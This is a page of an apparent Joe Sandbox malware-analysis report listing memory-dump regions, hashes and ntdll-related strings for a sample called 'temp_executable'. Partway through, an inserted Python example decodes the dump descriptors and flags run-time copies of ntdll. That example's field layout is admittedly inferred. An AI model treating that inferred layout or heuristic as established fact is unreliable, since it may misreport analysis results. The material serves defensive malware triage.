                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: bd2d5fab06deb0544255afc975de735f64acb60969ecd73f3c50bc91eddb254e
                                • Instruction ID: 42e13dd6a7525e81c685b20f7692ed0722532cb0dc9efc3487b164d3b70a0275
                                • Opcode Fuzzy Hash: bd2d5fab06deb0544255afc975de735f64acb60969ecd73f3c50bc91eddb254e
                                • Instruction Fuzzy Hash: B942F07520A3859FD306CF28C880B6ABBE5FF88348F544969F985CB351DB74D845CB62
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: 651b9eb4e3cadb4ecf7f292ce5058be40bebcdb480fab1a657ea97d7d4d49f7f
                                • Instruction ID: 53657bd50c660ac3723e8648f8279c59425f38b592565f29a71a2d2b7378d728
                                • Opcode Fuzzy Hash: 651b9eb4e3cadb4ecf7f292ce5058be40bebcdb480fab1a657ea97d7d4d49f7f
                                • Instruction Fuzzy Hash: 85C12675A00355ABEF088B64D891BBEB7A1AF45348F648069EC41EB394DFF4DD44C3A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: 96ea23673a1cb3c73f61ab1886408c1c5d407463cb34979150fc4665ced27ea9
                                • Instruction ID: bba5015406ecd7e3dced8b589519b903960998aa8192443e13933dc858eaedd1
                                • Opcode Fuzzy Hash: 96ea23673a1cb3c73f61ab1886408c1c5d407463cb34979150fc4665ced27ea9
                                • Instruction Fuzzy Hash: F9917E70A06358DFFB15CF24C869B9E37A0EF04759F540069EA517B380EBB49881CBE0
                                Strings
                                • Loading import redirection DLL: '%wZ', xrefs: 32DB7F7B
                                • LdrpInitializeProcess, xrefs: 32D7C5E4
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 32DB7FF0
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32DB7F8C, 32DB8000
                                • LdrpInitializeImportRedirection, xrefs: 32DB7F82, 32DB7FF6
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D7C5E3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: 3eca4299046b60edc5a0ca185a435794e35a1e5850d476142dd5685462c413cb
                                • Instruction ID: 59bc475fd2d928ad787930d21726769e4793cbcb11525f94100259dd395aedd9
                                • Opcode Fuzzy Hash: 3eca4299046b60edc5a0ca185a435794e35a1e5850d476142dd5685462c413cb
                                • Instruction Fuzzy Hash: 6A3105B56053419FD314DF28E855E2BB7D4EF88B18F400958F985AB391EA64DC09CBF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: deb0fe9308b3aeca83cba5d8e19f24a60948f5b9cf472687265c654d657a09ff
                                • Instruction ID: c4887eebc0b0d5c1d57f8788d5372222dc457446559fdb7734ed8fdce6c1fe63
                                • Opcode Fuzzy Hash: deb0fe9308b3aeca83cba5d8e19f24a60948f5b9cf472687265c654d657a09ff
                                • Instruction Fuzzy Hash: B6F1AD74A00605DFEB05CF68D890F6AB7B5FF48345F2481A9E8559B381DBB4E981CFA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-2283098728
                                • Opcode ID: 0d399306e362edb4c3aca9c943e39066e495c222e23252eca13fe65036198196
                                • Instruction ID: 68437ee62938dc9041ba674569c4bbac2a4e32c16b1a3f347161fbd60bb2f85a
                                • Opcode Fuzzy Hash: 0d399306e362edb4c3aca9c943e39066e495c222e23252eca13fe65036198196
                                • Instruction Fuzzy Hash: 4A5136757013019FE715DF38C884BB9F3A1BB8431CF940A2DE9929B791DBB09845CBA1
                                APIs
                                Strings
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 32DB80E9
                                • Failed to reallocate the system dirs string !, xrefs: 32DB80E2
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DB80F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1783798831
                                • Opcode ID: f78fe95cf142d5506df1a7123849483f2830e43a3a0d4a0cf30b24955be2db1b
                                • Instruction ID: f0210c8b47e255508c12537f8487bf308e87f93fb093c27b7f97634310a27ca6
                                • Opcode Fuzzy Hash: f78fe95cf142d5506df1a7123849483f2830e43a3a0d4a0cf30b24955be2db1b
                                • Instruction Fuzzy Hash: AD4125B5546344AFDB11DF28DC45B4B37E8EF44791F50482ABA88E3360EBB4D885CBA1
                                APIs
                                Strings
                                • LdrpCheckRedirection, xrefs: 32DC450F
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32DC4508
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32DC4519
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 3446177414-3154609507
                                • Opcode ID: 494d0b82a1350984b0479048d04e6ada9f1e54be6d55eb8a08a435898d8ac549
                                • Instruction ID: 08806f34db0986e4ee78a70374528fc45d1adc865a153f5f3a59222611b07c4c
                                • Opcode Fuzzy Hash: 494d0b82a1350984b0479048d04e6ada9f1e54be6d55eb8a08a435898d8ac549
                                • Instruction Fuzzy Hash: F04122766097318FDB11CF68D940A1677E4EF88795F660A5AEC8AE7311DBB0EC00CB91
                                Strings
                                • Kernel-MUI-Language-Allowed, xrefs: 32D6519B
                                • Kernel-MUI-Language-Disallowed, xrefs: 32D65272
                                • Kernel-MUI-Language-SKU, xrefs: 32D6534B
                                • WindowsExcludedProcs, xrefs: 32D6514A
                                • Kernel-MUI-Number-Allowed, xrefs: 32D65167
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-258546922
                                • Opcode ID: 1021b56dcc91ffc3a4a47d6bfa46d3955693b4ba11384b1eb3aca1197af6d6d3
                                • Instruction ID: 3fb7e20b4295900f5d51fb01b80b44a663942dad9fe36997d9ca7c4490069e19
                                • Opcode Fuzzy Hash: 1021b56dcc91ffc3a4a47d6bfa46d3955693b4ba11384b1eb3aca1197af6d6d3
                                • Instruction Fuzzy Hash: E6F12AB6D10219EFDB15CF98C990EAEBBB8EF08754F51406AE501B7710DBB49E41CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: e5bbdc3c760d0e043db0f6d2a85293c383896dd73f21ccc3909016ed77e77e5f
                                • Instruction ID: 6e07927f058756638946c8df6b946f96f787cb6c2e7573a9aa0ea6fd80afe59a
                                • Opcode Fuzzy Hash: e5bbdc3c760d0e043db0f6d2a85293c383896dd73f21ccc3909016ed77e77e5f
                                • Instruction Fuzzy Hash: 96F108B7F006158BCB08CF69C99167DBBF5AF88204B5A817DD866DB380DA74F941CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: ff122fff1b28bc3b393da9e7623e8486c89efdaf9858c4f29217a8766c8e4286
                                • Instruction ID: 593ad0aa16f708d090ad086cebfa710c32384fc73a4152dd8470e70c22507c59
                                • Opcode Fuzzy Hash: ff122fff1b28bc3b393da9e7623e8486c89efdaf9858c4f29217a8766c8e4286
                                • Instruction Fuzzy Hash: C9014737006280EEF34A832DF409FC277A4DB46731F25448AF1404BF90DEA5A884D970
                                APIs
                                Strings
                                • kLsE, xrefs: 32D405FE
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32D40586
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 3446177414-2547482624
                                • Opcode ID: 59107cfec910269859bb303286f3a6fbeaa942a06346f9510480ceb7e99d9d2b
                                • Instruction ID: fd944123264df6516f028efab1720023ceafe963bcf2333c19d19ed4fea93487
                                • Opcode Fuzzy Hash: 59107cfec910269859bb303286f3a6fbeaa942a06346f9510480ceb7e99d9d2b
                                • Instruction Fuzzy Hash: 3751BAB5A00746DFE718DFA4D4407AAB7F4EF44305F00882EDA9A97340EF709545CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: 1cb030cf80cf8c16f842bd66b7bd1b0de61fdc72c9089b2a259daf0a790758e1
                                • Instruction ID: c4d8357b3baf2f64357870d1dfd25744c9305bf254809fdd18eb4577a6255dcf
                                • Opcode Fuzzy Hash: 1cb030cf80cf8c16f842bd66b7bd1b0de61fdc72c9089b2a259daf0a790758e1
                                • Instruction Fuzzy Hash: F8C19A74108382CFE715CF65C165B5AB7E4BF84748F40896AF8998B390EF74C946CB62
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
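The Memory Dump Source lines on this page name each dump with a dotted descriptor. Two kinds appear here: a private region at 32D10000 with protection 00000040 and type 00020000 whose string xrefs come from minkernel\ntdll\*.c (ldrinit.c, ldrredirect.c, ldrsnap.c) and from the RTL heap and critical-section code, and the image regions of the PE at 00400000 (type 01000000, protections 00000020, 00000002 and 00000008). The Python below is an added example, not part of the Joe Sandbox report; it decodes those descriptors, cross-checks them against the Joe Sandbox IDA Plugin snapshot name, and flags a non-image executable region that carries ntdll's own source-path strings, which is ntdll code that did not arrive via the loader. The field layout, the reading of the first two fields as process index and analysis phase, and the snapshot naming pattern are assumptions inferred from the entries on this page; the protection and type values are the winnt.h PAGE_* and MEM_* constants. The final flag is a triage heuristic, not a verdict.

```python
"""Decode Joe Sandbox "Memory Dump Source" descriptors and flag the pattern seen
on this page: a private, executable region whose strings come from ntdll sources.
Added example, not part of the Joe Sandbox report. ASSUMPTION: the dotted layout
<proc>.<phase>.<id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp is inferred from the
descriptors on the page; fields 5 and 7 are winnt.h PAGE_* / MEM_* values, while
fields 6 and 8 are kept raw (0x1000 on the private region, 0x1 on image regions)."""
import re
from dataclasses import dataclass

# winnt.h protection values (low byte; PAGE_GUARD and PAGE_NOCACHE are modifier bits).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000   # MEMORY_BASIC_INFORMATION.Type
MEM_TYPES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

DESCRIPTOR_RE = re.compile(
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
SOURCE_RE = re.compile(
    r"Source File:\s*(\S+?\.sdmp),\s*Offset:\s*([0-9A-F]+),\s*based on PE:\s*(true|false)", re.I)
# Snapshot names on the page read hcaresult_<proc>_<phase>_<offset>_...jbxd (assumption).
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9A-F]+)_", re.I)

@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    phase: int
    dump_id: str
    base: int
    protect: int
    field6: int
    mem_type: int
    field8: int
    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:X}")
    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:X}")
    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

@dataclass(frozen=True)
class SourceEntry:
    region: DumpRegion
    offset: int          # base the listed function addresses are relative to
    based_on_pe: bool

def parse_descriptor(name: str) -> DumpRegion:
    m = DESCRIPTOR_RE.search(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump descriptor: {name!r}")
    f = m.groups()
    return DumpRegion(int(f[0], 16), int(f[1], 16), f[2], int(f[3], 16),
                      int(f[4], 16), int(f[5], 16), int(f[6], 16), int(f[7], 16))

def parse_source_line(line: str) -> SourceEntry:
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a 'Source File' line: {line!r}")
    return SourceEntry(parse_descriptor(m.group(1)), int(m.group(2), 16), m.group(3).lower() == "true")

def snapshot_matches(snapshot: str, entry: SourceEntry) -> bool:
    """The IDA snapshot name should carry the same process index, phase and base
    offset as the dump it was built from; a mismatch means mixed-up entries."""
    m = SNAPSHOT_RE.search(snapshot)
    return bool(m) and (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == (
        entry.region.process_index, entry.region.phase, entry.offset)

def region_kind(r: DumpRegion) -> str:
    if r.mem_type == MEM_IMAGE:
        return "image"               # mapped by the loader from a PE on disk
    if r.mem_type == MEM_PRIVATE and r.executable:
        return "private-executable"  # allocated at run time and holding code
    return "mapped" if r.mem_type == MEM_MAPPED else "private-data"

def is_runtime_copy_of_ntdll(r: DumpRegion, strings) -> bool:
    """Executable memory that is not an image mapping but carries ntdll's own
    source-path strings holds ntdll code that did not get there via the loader."""
    return region_kind(r) == "private-executable" and any(
        "minkernel\\ntdll\\" in s.lower() for s in strings)

if __name__ == "__main__":
    # Entries copied from this page: the ntdll-string region, then the dropped PE.
    for line, snap, strs in [
        ("Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000"
         ".00020000.00000000.sdmp, Offset: 32D10000, based on PE: true",
         "hcaresult_3_2_32d10000_temp_executable.jbxd", ["minkernel\\ntdll\\ldrinit.c"]),
        ("Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001"
         ".01000000.00000007.sdmp, Offset: 00400000, based on PE: true",
         "hcaresult_3_2_400000_temp_executable.jbxd", ["HvB"])]:
        e = parse_source_line(line)
        print(f"{e.region.base:#010x} {e.region.protect_name} {e.region.type_name} {region_kind(e.region)}"
              f" snapshot_ok={snapshot_matches(snap, e)} ntdll_copy={is_runtime_copy_of_ntdll(e.region, strs)}")
```

Run against the two entries above it reports the 32D10000 region as PAGE_EXECUTE_READWRITE / MEM_PRIVATE / private-executable with the ntdll flag set, and the 00401000 region as PAGE_EXECUTE_READ / MEM_IMAGE / image with the flag clear; both snapshot names match their dumps. The snapshot check compares against the Offset value, not the region base, because the 400000 snapshot covers the whole module while the descriptor names one section at 401000.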
                                Strings
                                • LdrpInitializeProcess, xrefs: 32D78342
                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 32D7847E
                                • @, xrefs: 32D784B1
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D78341
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1918872054
                                • Opcode ID: 26260a53b4871c131f08a9d089b4041dbb8ce6cde1f2f112ed719807be2031f2
                                • Instruction ID: 88d9cf8523a0fb658b7054aab21dfd9b3fed2f129bb2cbe523a2c1e51cb4a2ec
                                • Opcode Fuzzy Hash: 26260a53b4871c131f08a9d089b4041dbb8ce6cde1f2f112ed719807be2031f2
                                • Instruction Fuzzy Hash: A2918271508385AFE721CF24D854FABB7EDAF84788F40092EFA85D2250D778D944DB62
                                Strings
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 32DB20C0
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32DB1FE3, 32DB20BB
                                • SXS: %s() passed the empty activation context, xrefs: 32DB1FE8
                                • .Local, xrefs: 32D727F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: fd0d155684ae9a82f3fb6b2263a5d8b95f8e5890c47398ab385c8946a0584c0b
                                • Instruction ID: 9d3cd095d6571c6d9a44d9ea957fc7b9ecb8d381dec5f7d39a06550b1a1e1a37
                                • Opcode Fuzzy Hash: fd0d155684ae9a82f3fb6b2263a5d8b95f8e5890c47398ab385c8946a0584c0b
                                • Instruction Fuzzy Hash: D1A1C07590036ADBDB24CF58DC88B99B3B0BF58318F2401EAD848A7355DB759E85CF90
                                Strings
                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32DA0E2F
                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32DA0E72
                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32DA0DEC
                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32DA0EB5
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                • API String ID: 0-1468400865
                                • Opcode ID: 4178e4a97b298ff8910b5dae178ca6877b798fc501b9a8d151ad9a667daa9498
                                • Instruction ID: 72861767d5d900e5afd56c13b6515af26535290f0076bc9b26c35e24fffcc34f
                                • Opcode Fuzzy Hash: 4178e4a97b298ff8910b5dae178ca6877b798fc501b9a8d151ad9a667daa9498
                                • Instruction Fuzzy Hash: BE71B1B59083449FDB51CF14D884F8B7BA8AF84794F800469FD498B38ADB74D588CBE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                • Opcode ID: a43e68f4b7dc03ea423913a5bf3d29320a06df83b8b8cf1da73ac2856718539d
                                • Instruction ID: d317ab3438dacabaca804076285bc2c98d26c413208bc2c54c66deebae9b79a7
                                • Opcode Fuzzy Hash: a43e68f4b7dc03ea423913a5bf3d29320a06df83b8b8cf1da73ac2856718539d
                                • Instruction Fuzzy Hash: 95612575205384AFE316CB64DC44FA7B7E8EF84754F04485AFA949B391CB74E840CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 2994545307-1391187441
                                • Opcode ID: ce90d99538899fe07cd8c6f74a8d4c2b4df0176b08a3848e0c2dd5f0c27e3e95
                                • Instruction ID: a9fba41a293a306b5d5df71c26f00817f587722ab67d70c76a278f6530e6bc99
                                • Opcode Fuzzy Hash: ce90d99538899fe07cd8c6f74a8d4c2b4df0176b08a3848e0c2dd5f0c27e3e95
